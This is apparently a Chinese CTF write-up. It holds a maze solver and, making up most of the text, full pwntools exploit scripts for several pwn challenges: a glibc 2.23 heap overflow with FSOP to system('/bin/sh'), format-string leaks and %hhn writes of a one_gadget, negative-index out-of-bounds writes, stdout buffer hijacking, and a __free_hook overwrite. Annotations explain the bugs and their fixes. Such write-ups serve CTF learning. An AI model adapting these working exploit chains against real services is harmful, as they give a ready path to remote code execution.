冲塔失败,三亚之旅要看i春秋前面ban几个了,附件
Misc
babymaze1
1 | #coding=utf-8 |
2 | from pwn import* |
3 | import numpy as np |
4 | #context.log_level = 'DEBUG' |
def Get_T(s):
    """Read ``s`` lines of maze text from the module-level connection ``p`` and parse them.

    Each cell character is first remapped to a small integer so the walkers can
    treat the grid numerically: ``'#'`` -> 0 (the "black" wall cell), ``' '`` -> 1
    (the "white" open cell), ``'$'`` -> 3 (the "flag"/goal cell) and ``'*'`` -> 2
    (the start marker).

    Returns ``(grid, start, end)``: ``grid`` is a list of rows, each a list of the
    remapped ints for every character except the newline; ``start`` and ``end``
    are ``[row, col]`` lists for the ``'*'`` and ``'$'`` cells.  If a marker
    occurs more than once its extra coordinates are appended to the same list
    (original behaviour, kept as-is).
    """
    raw = ''
    for _ in range(s):
        raw += p.recvline()
    # Sequential replacements, in the original order; no target byte collides
    # with a later source byte, so the order is only relevant for faithfulness.
    for src, dst in (('\x23', '\x00'), ('\x20', '\x01'), ('\x24', '\x03'), ('\x2A', '\x02')):
        raw = raw.replace(src, dst)

    grid = []
    row = []
    r = 0
    c = 0
    start = []
    end = []
    for ch in raw:
        if ch == '\n':
            # End of a row: store it and move to the next row, first column.
            grid.append(row)
            row = []
            r += 1
            c = 0
            continue
        if ch == '\x02':
            start.extend((r, c))
        elif ch == '\x03':
            end.extend((r, c))
        row.append(ord(ch))
        c += 1
    return grid, start, end
39 | ############################### |
def up(location):
    """Try to step one row up from ``location`` (``[row, col]``).

    The step is taken only when the new cell is inside the grid, has not been
    visited yet (absent from ``history_path``) and is not a wall (``maze`` value
    0).  On success the new cell is pushed onto ``lookup_path`` (the current
    route) and ``history_path`` (everything ever visited) and ``True`` is
    returned; otherwise ``False``.  Reads the module-level ``maze``,
    ``history_path`` and ``lookup_path``.
    """
    row, col = location[0], location[1]
    # Top row: there is nothing above.
    if row == 0:
        return False
    target = [row - 1, col]
    # Never revisit a cell, never walk into a wall (history is checked first,
    # so a wall that was never visited still costs one maze lookup).
    if target in history_path or maze[target[0]][target[1]] == 0:
        return False
    lookup_path.append(target)
    history_path.append(target)
    return True
57 | |
58 | |
def down(location):
    """Try to step one row down from ``location`` (``[row, col]``).

    Refuses when already on the last row, when the cell below was visited
    before (``history_path``) or when it is a wall (``maze`` value 0).  On
    success the new cell is appended to ``history_path`` and ``lookup_path``
    and ``True`` is returned.  Uses the module-level ``maze``, ``history_path``
    and ``lookup_path``.
    """
    row, col = location[0], location[1]
    # Bottom row of the grid: cannot go further down.
    if row == len(maze) - 1:
        return False
    target = [row + 1, col]
    # Visited cells and walls are both dead ends.
    if target in history_path or maze[target[0]][target[1]] == 0:
        return False
    history_path.append(target)
    lookup_path.append(target)
    return True
75 | |
76 | |
def left(location):
    """Try to step one column left from ``location`` (``[row, col]``).

    Refuses at column 0, on an already visited cell (``history_path``) or on a
    wall (``maze`` value 0).  Otherwise records the new cell in
    ``history_path`` and ``lookup_path`` and returns ``True``.  Uses the
    module-level ``maze``, ``history_path`` and ``lookup_path``.
    """
    row, col = location[0], location[1]
    # Leftmost column: nothing to the left.
    if col == 0:
        return False
    target = [row, col - 1]
    # Skip visited cells and walls.
    if target in history_path or maze[target[0]][target[1]] == 0:
        return False
    history_path.append(target)
    lookup_path.append(target)
    return True
93 | |
94 | |
def right(location):
    """Try to step one column right from ``location`` (``[row, col]``).

    The rightmost column is taken from ``len(maze[0]) - 1``, i.e. the grid is
    assumed rectangular.  Refuses on that edge, on a visited cell
    (``history_path``) or on a wall (``maze`` value 0); otherwise records the
    new cell in ``history_path`` and ``lookup_path`` and returns ``True``.
    Uses the module-level ``maze``, ``history_path`` and ``lookup_path``.
    """
    row, col = location[0], location[1]
    # Rightmost column (width taken from the first row).
    if col == len(maze[0]) - 1:
        return False
    target = [row, col + 1]
    # Skip visited cells and walls.
    if target in history_path or maze[target[0]][target[1]] == 0:
        return False
    history_path.append(target)
    lookup_path.append(target)
    return True
def get_line(path):
    """Encode a list of ``[row, col]`` waypoints as a string of WASD moves.

    Consecutive waypoints are compared pairwise: a decreasing row gives ``'w'``,
    an increasing row ``'s'``, a decreasing column ``'a'`` and an increasing
    column ``'d'``.  Row and column are judged independently, so a diagonal
    jump produces two letters; a repeated waypoint produces none.  Fewer than
    two waypoints give ``''``.
    """
    moves = []
    for here, there in zip(path, path[1:]):
        if here[0] > there[0]:
            moves.append('w')
        elif here[0] < there[0]:
            moves.append('s')
        if here[1] > there[1]:
            moves.append('a')
        elif here[1] < there[1]:
            moves.append('d')
    return ''.join(moves)
125 | |
126 | |
# --- driver: connect to the challenge and solve its five maze levels ----------
p = remote('182.92.203.154',11001)
p.sendlineafter('Please press any key to start.','FMYY')

for level in range(5):
    log.info('LEVEL' + str(level + 1))
    # Level k is read as 11 + 10*k lines of maze text.
    maze, start, end = Get_T(11 + level * 10)
    # Depth-first walk.  lookup_path is the current route (used as a stack),
    # history_path every cell ever entered; the four walkers consult both
    # through these module-level names.
    lookup_path = [start]
    history_path = [start]
    while lookup_path[-1] != end:
        now = lookup_path[-1]
        moved = up(now) or down(now) or left(now) or right(now)
        if not moved:
            # Dead end: backtrack one step and retry from the previous cell.
            lookup_path.pop()
    path = get_line(lookup_path)
    p.sendlineafter('> ', path)
    p.recvuntil('your win\n')

p.interactive()
Pwn
wind_farm_panel
1 | from pwn import* |
def menu(ch):
    """Select menu entry ``ch`` on the module-level connection ``p``.

    ``ch`` is stringified and sent as a line once the ``'>> '`` prompt arrives.
    """
    choice = str(ch)
    p.sendlineafter('>> ', choice)
def new(index,size,content):
    """Menu option 1: create turbine ``index`` with ``size`` and the raw name ``content``.

    ``index`` and ``size`` are sent as lines after their prompts; ``content`` is
    sent with ``sendafter`` and therefore carries no trailing newline.
    """
    menu(1)
    for prompt, value in ((': ', index), ('turbine: ', size)):
        p.sendlineafter(prompt, str(value))
    p.sendafter('name: ', content)
def show(index):
    """Menu option 2: ask the service to display turbine ``index``."""
    menu(2)
    which = str(index)
    p.sendlineafter('viewed: ', which)
def edit(index,content):
    """Menu option 3: overwrite turbine ``index`` with ``content`` (sent raw, no newline appended)."""
    menu(3)
    which = str(index)
    p.sendlineafter('turbine: ', which)
    p.sendafter('input: ', content)
# --- wind_farm_panel driver (glibc 2.23) -------------------------------------
# Turbine 0 is created with size 0x200 but 0x20C bytes of content, so the
# service evidently copies more than the requested size into the allocation
# (heap overflow); the service-side fix is to bound the copy by ``size``.
# The send/recv order and byte layouts below are exact protocol state, so the
# code is left untouched and only annotated.
p = process('./main')
# The local process is immediately replaced by the remote connection.
p = remote('182.92.203.154',28452)
libc =ELF('./libc-2.23.so')
# 0x208 zero bytes followed by the 32-bit value 0xDF1 into a 0x200 turbine.
new(0,0x200,'\x00'*0x208 + p32(0xDF1))
new(1,0x1000,'FMYY')
new(2,0x100,'\xA0')
# Displaying turbine 2 echoes heap memory; the 6 bytes ending at the first
# 0x7F are taken as a libc pointer.  The 0x70 + 0x620 adjustment relative to
# __malloc_hook is the author's constant for this libc build.
show(2)
libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['__malloc_hook'] - 0x70 - 0x620
log.info('LIBC:\t' + hex(libc_base))

IO_list_all = libc_base + libc.sym['_IO_list_all']
# 0x3C37A0 is a hard-coded libc-2.23 offset (presumably _IO_str_jumps, which
# has no exported symbol); it only holds for this exact libc build.
IO_str_jumps = libc_base + 0x3C37A0
# Fake FILE structure carried as turbine 3's name.  glibc 2.24 and later
# validate FILE vtable pointers, which is why this layout is specific to 2.23.
fake_IO_FILE = p64(0) + p64(0x61)
fake_IO_FILE += p64(0) + p64(IO_list_all - 0x10)
fake_IO_FILE += p64(0) + p64(1)
fake_IO_FILE += p64(0) + p64(libc_base + libc.search('/bin/sh').next())
fake_IO_FILE = fake_IO_FILE.ljust(0xD8,'\x00')
fake_IO_FILE += p64(IO_str_jumps - 8)
fake_IO_FILE += p64(0) + p64(libc_base + libc.sym['system'])
# 0x200 bytes of padding put the fake structure past the requested size again.
new(3,0x200,'\x00'*0x200 + fake_IO_FILE)
# Option 1 with index 4 and size 0x200, sent without waiting for prompts;
# presumably the allocation that makes the corrupted state take effect —
# confirm against the binary.
menu(1)
p.sendline('4')
p.sendline(str(0x200))
p.interactive()
shell
1 | from pwn import* |
# --- shell: format-string driver (glibc 2.23) -----------------------------
# Every line sent starts with 'fg %…' and the service's reply is parsed as the
# output of that conversion, so the user line evidently reaches a printf-family
# call as the *format* argument.  The service-side fix is the standard one:
# printf("%s", buf) / a fixed format, and building with -Wformat-security so
# the compiler rejects non-literal formats.  The sends are order- and
# offset-sensitive, so the code is kept verbatim and only annotated.
context.log_level = 'DEBUG'
p = process('./main')
# The local process is immediately replaced by the remote connection.
p = remote('182.92.203.154',35264)
libc =ELF('./libc-2.23.so')
# Leak 1: '%12$p' prints the 12th variadic slot as a pointer; 0x203169 is
# presumably its offset from the program image base (author's constant).
p.sendline('fg %12$p')
p.recvuntil('0x')
proc_base = int(p.recv(12),16) - 0x203169
log.info('Proc:\t' + hex(proc_base))



# Leak 2: the line is padded to 0x10 bytes and an address appended; '%174$s'
# presumably reads that appended address as a string argument, returning the
# pointer stored at proc_base + 0x2030B8.  The 6 bytes ending at the first
# 0x7F are rebased against libc's getopt (again an author's constant pairing).
payload = 'fg %174$s'
payload = payload.ljust(0x10,'U')
payload += p64(proc_base + 0x2030B8)
p.sendline(payload)
libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['getopt']
log.info('LIBC:\t' + hex(libc_base))


# Write: six lines, each storing one byte of libc_base + 0x45226 (byte k
# selected with >> 8*k & 0xFF) at proc_base + 0x2030C8 + k via '%hhn'.
# 0x45226 is a libc-2.23 offset taken from the author's analysis; the 0.2 s
# sleeps only pace the sends.
payload = 'fg %' + str((libc_base + 0x45226)&0xFF) + 'c%174$hhn'
payload = payload.ljust(0x10,'U')
payload += p64(proc_base + 0x2030C8)
p.sendline(payload )

sleep(0.2)
payload = 'fg %' + str(((libc_base + 0x45226)>>8)&0xFF) + 'c%174$hhn'
payload = payload.ljust(0x10,'U')
payload += p64(proc_base + 0x2030C8 + 1)
p.sendline(payload )

sleep(0.2)
payload = 'fg %' + str(((libc_base + 0x45226)>>16)&0xFF) + 'c%174$hhn'
payload = payload.ljust(0x10,'U')
payload += p64(proc_base + 0x2030C8 + 2)
p.sendline(payload)

sleep(0.2)
payload = 'fg %' + str(((libc_base + 0x45226)>>24)&0xFF) + 'c%174$hhn'
payload = payload.ljust(0x10,'U')
payload += p64(proc_base + 0x2030C8 + 3)
p.sendline(payload)

sleep(0.2)
payload = 'fg %' + str(((libc_base + 0x45226)>>32)&0xFF) + 'c%174$hhn'
payload = payload.ljust(0x10,'U')
payload += p64(proc_base + 0x2030C8 + 4)
p.sendline(payload)

sleep(0.2)
payload = 'fg %' + str(((libc_base + 0x45226)>>40)&0xFF) + 'c%174$hhn'
payload = payload.ljust(0x10,'U')
payload += p64(proc_base + 0x2030C8 + 5)
p.sendline(payload)
# 'quit' presumably leaves the command loop; whatever the service does on exit
# uses the overwritten pointer — confirm against the binary.
p.sendline('quit')
p.interactive()
Power_System [After Game]
第一次知道 strncmp 并不是严格按 n 个字节比较的,遇到 \0 仍然会截断
爆破脚本
1 | # coding=utf-8 |
2 | from pwn import* |
3 | from Crypto.Util.number import * |
4 | import string |
5 | import hashlib |
6 | import random |
# Fixed prefix that passwd() prepends to each 4-character candidate before
# hashing; the same string appears as the account password in exp2's login().
s = '%p%p%pLC:%p'
def passwd():
    """Brute-force the 4-character alphanumeric suffix ``code`` for which
    SHA-256(``s`` + ``code``), as an upper-case hex digest, starts with ``'E85000'``.

    The search is delegated to pwntools' ``util.iters.mbruteforce`` over
    ``string.ascii_letters + string.digits`` with a fixed length of 4; the
    matching suffix is returned.
    """
    alphabet = string.ascii_letters + string.digits

    def matches(code):
        # hexdigest() is the same lower-case hex that digest().encode('hex') gives.
        digest_hex = hashlib.sha256(s + code).hexdigest().upper()
        return digest_hex.startswith('E85000')

    return util.iters.mbruteforce(matches, alphabet, 4, 'fixed')
# Print the suffix found (parenthesised form: identical output under Python 2,
# and also valid syntax under Python 3).
print(passwd())
exp1
思路来自havik师傅,劫持stdout的缓冲区到bss,让缓冲区的字节修改0x7008位置的指针,实现任意写
1 | from pwn import* |
2 | #context.log_level = 'DEBUG' |
def menu(ch):
    """Select menu entry ``ch`` on the module-level connection ``p``.

    ``ch`` is stringified and sent as a line once the ``'>> '`` prompt arrives.
    """
    choice = str(ch)
    p.sendlineafter('>> ', choice)
def adjust(index,size,content):
    """Menu option 2: set power ``index`` to ``size`` and send ``content`` as the staff data.

    ``index`` and ``size`` are sent as lines after their prompts; ``content`` is
    sent with ``sendafter`` and therefore carries no trailing newline.  The
    driver passes negative indices here, i.e. the service does not appear to
    range-check ``index``.
    """
    menu(2)
    for prompt, value in (('the power: ', index), ('size: ', size)):
        p.sendlineafter(prompt, str(value))
    p.sendafter('staff: ', content)
def delete(index):
    """Menu option 3: delete power ``index`` (defined for completeness; unused by the driver below)."""
    menu(3)
    which = str(index)
    p.sendlineafter('power: ', which)
def login():
    """Menu option 2: log in as account ``'QAQ'`` with the fixed password ``'rCLQ'`` plus a newline.

    The password goes through ``sendafter``, so the newline has to be part of
    the string.  ``'rCLQ'`` is presumably the suffix obtained from the
    brute-force script above — confirm.
    """
    menu(2)
    account, password = 'QAQ', 'rCLQ\n'
    p.sendlineafter('account :', account)
    p.sendafter('password :', password)
# --- exp1 driver (glibc 2.29) -------------------------------------------------
# Every adjust() call below uses a negative index (-6, -13) to reach memory
# outside the power array, so the service evidently does not range-check the
# index; the root-cause fix is a bounds check on ``index`` before use.  The
# write-up's summary: redirect stdout's buffer to .bss so that its bytes change
# the pointer at 0x7008.  Sends, receives and byte offsets are exact protocol
# state and are left untouched; comments only describe each step.
p = process('./main')
# The local process is immediately replaced by the remote connection.
p = remote('182.92.203.154',15268)
libc =ELF('./libc-2.29.so')
login()
# Step 1: 0x17 zero bytes via index -6, then the 2 / -2 / 0 menu answers sent
# blind, followed by 0xD8 zero bytes and the constant 0xFBAD1800.  The 6-byte
# value ending at the first 0x7F is rebased against _IO_2_1_stdin_ with an
# extra 0xD00 (author's constant for this libc build).
adjust(-6,0,'\x00'*0x17 + '\n')
p.sendline('2')
p.sendline('-2')
p.sendline('0')
p.sendline('\x00'*0xD8 + p64(0xFBAD1800))
libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['_IO_2_1_stdin_'] - 0xD00
log.info('LIBC:\t' + hex(libc_base))
environ = libc_base + libc.sym['environ']
# ``system`` is computed here but never used in this script.
system = libc_base + libc.sym['system']
IO_stdout_off = libc_base + libc.sym['_IO_2_1_stdout_'] + 131
# Step 2: same 2 / -2 / 0 sequence, now with five pointers (environ, environ+8
# twice, IO_stdout_off, IO_stdout_off+1) after 0x18 zero bytes; the reply is a
# stack address.
adjust(-6,0,'\x00'*0x18 + p64(environ) + p64(environ + 8) + p64(environ + 8) + p64(IO_stdout_off) + p64(IO_stdout_off + 1) + '\n')
p.sendline('2')
p.sendline('-2')
p.sendline('0')
p.sendline('\x00'*0xD8 + p64(0xFBAD1800))

stack = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00'))
log.info('Stack:\t' + hex(stack))
# Step 3: same sequence again, pointing at stack - 0x160; the first 6 raw bytes
# of the reply are a program address, rebased with the author's 0x7040 offset.
leak_address = stack - 0x160
adjust(-6,0,'\x00'*0x18 + p64(leak_address) + p64(leak_address + 8) + p64(leak_address + 8) + p64(IO_stdout_off) + p64(IO_stdout_off + 1) + '\n')
p.sendline('2')
p.sendline('-2')
p.sendline('0')
p.sendline('\x00'*0xD8 + p64(0xFBAD1800))

proc_base = u64(p.recv(6).ljust(8,'\x00')) - 0x7040
log.info('Proc:\t' + hex(proc_base))

# Step 4: six copies of proc_base + 0x7000, then +2 and +9, followed by the
# same 2 / -2 / 0 sequence (this is the 0x7008 pointer the write-up mentions).
leak_address = proc_base + 0x7000
adjust(-6,0,p64(leak_address)*6 + p64(leak_address + 2) + p64(leak_address + 9)+ '\n')
p.sendline('2')
p.sendline('-2')
p.sendline('0')
p.sendline('\x00'*0xD8 + p64(0xFBAD1800))

# Step 5: index -13 receives p64(1) + p64(_IO_file_jumps + 0x18 - 8); index 1
# then receives libc_base + 0x106EF8, a libc-2.29 offset from the author's
# analysis (not derivable from this script).
IO_overflow = libc_base + libc.sym['_IO_file_jumps'] + 0x18
adjust(-13,0,p64(1) + p64(IO_overflow - 8) + '\n')
adjust(1,0,p64(libc_base + 0x106EF8) + '\n')
p.interactive()
exp2
走题目所给后门,2.24下的fsop 会调用free_buffer指针,而2.29改为调用free函数
1 | from pwn import* |
2 | #context.log_level = 'DEBUG' |
def menu(ch):
    """Select menu entry ``ch`` on the module-level connection ``p``.

    ``ch`` is stringified and sent as a line once the ``'>> '`` prompt arrives.
    """
    choice = str(ch)
    p.sendlineafter('>> ', choice)
def adjust(index,size,content):
    """Menu option 2: set power ``index`` to ``size`` and send ``content`` as the staff data.

    ``index`` and ``size`` are sent as lines after their prompts; ``content`` is
    sent with ``sendafter`` and therefore carries no trailing newline.  The
    driver passes a negative index here, i.e. the service does not appear to
    range-check ``index``.
    """
    menu(2)
    for prompt, value in (('the power: ', index), ('size: ', size)):
        p.sendlineafter(prompt, str(value))
    p.sendafter('staff: ', content)
def delete(index):
    """Menu option 3: delete power ``index`` (defined for completeness; unused by the driver below)."""
    menu(3)
    which = str(index)
    p.sendlineafter('power: ', which)
def login():
    """Menu option 2: log in as ``'QAQ'`` with a format-string password.

    The password is the prefix ``'%p%p%pLC:%p'`` followed by ``'bMUK'`` and a
    newline (sent with ``sendafter``, so the newline is explicit).  The driver
    afterwards parses the text after ``'LC:'`` in the reply as a pointer, so
    the service evidently formats the password string (format-string bug; the
    service-side fix is ``printf("%s", pw)``).  ``'bMUK'`` is presumably the
    brute-forced suffix from the passwd() script — confirm.
    """
    menu(2)
    account, password = 'QAQ', '%p%p%pLC:%pbMUK\n'
    p.sendlineafter('account :', account)
    p.sendafter('password :', password)
# --- exp2 driver (glibc 2.29), runs against the local binary ------------------
# The write-up's route: use the menu's own option 4 ("backdoor"), which prompts
# with '__free_hook' and takes a raw 8-byte value.  The libc leak comes from
# the password being formatted (see login()).  Sends and byte layouts are exact
# protocol state and are left untouched.
p = process('./main')
#p = remote('182.92.203.154',15268)
libc =ELF('./libc-2.29.so')
login()
# The service echoes the formatted password; the 14 characters after 'LC:'
# ('0x' + 12 hex digits) are a libc pointer, rebased with the author's
# 0x1EC540 constant for this libc build.
p.recvuntil('LC:')
libc_base = int(p.recv(14),16) - 0x1EC540
log.info('LIBC:\t' + hex(libc_base))

system = libc_base + libc.sym['system']

# ``IO_list_all`` is computed but not used anywhere below.
IO_list_all = libc_base + libc.sym['_IO_list_all']
# 0x1E6620 is a hard-coded libc-2.29 offset (presumably _IO_str_jumps, which
# has no exported symbol); valid only for this exact libc build.
IO_str_jumps = libc_base + 0x1E6620
# Fake FILE structure written through index -2 (another out-of-range index).
fake_IO_FILE = '\x00'*0x18
fake_IO_FILE += p64(0) + p64(1)
fake_IO_FILE += p64(0) + p64(libc_base + libc.search('/bin/sh').next())
fake_IO_FILE = fake_IO_FILE.ljust(0xD0,'\x00')
fake_IO_FILE += p64(IO_str_jumps - 8) + p64(0xFBAD2887)


adjust(-2,0,fake_IO_FILE)
p.sendline('FMYY')
# Option 4: the service asks for '__free_hook' and the address of system is
# sent as raw bytes (presumably stored into that hook — confirm against the
# binary).
menu(4)
p.sendlineafter('__free_hook',p64(system))
p.interactive()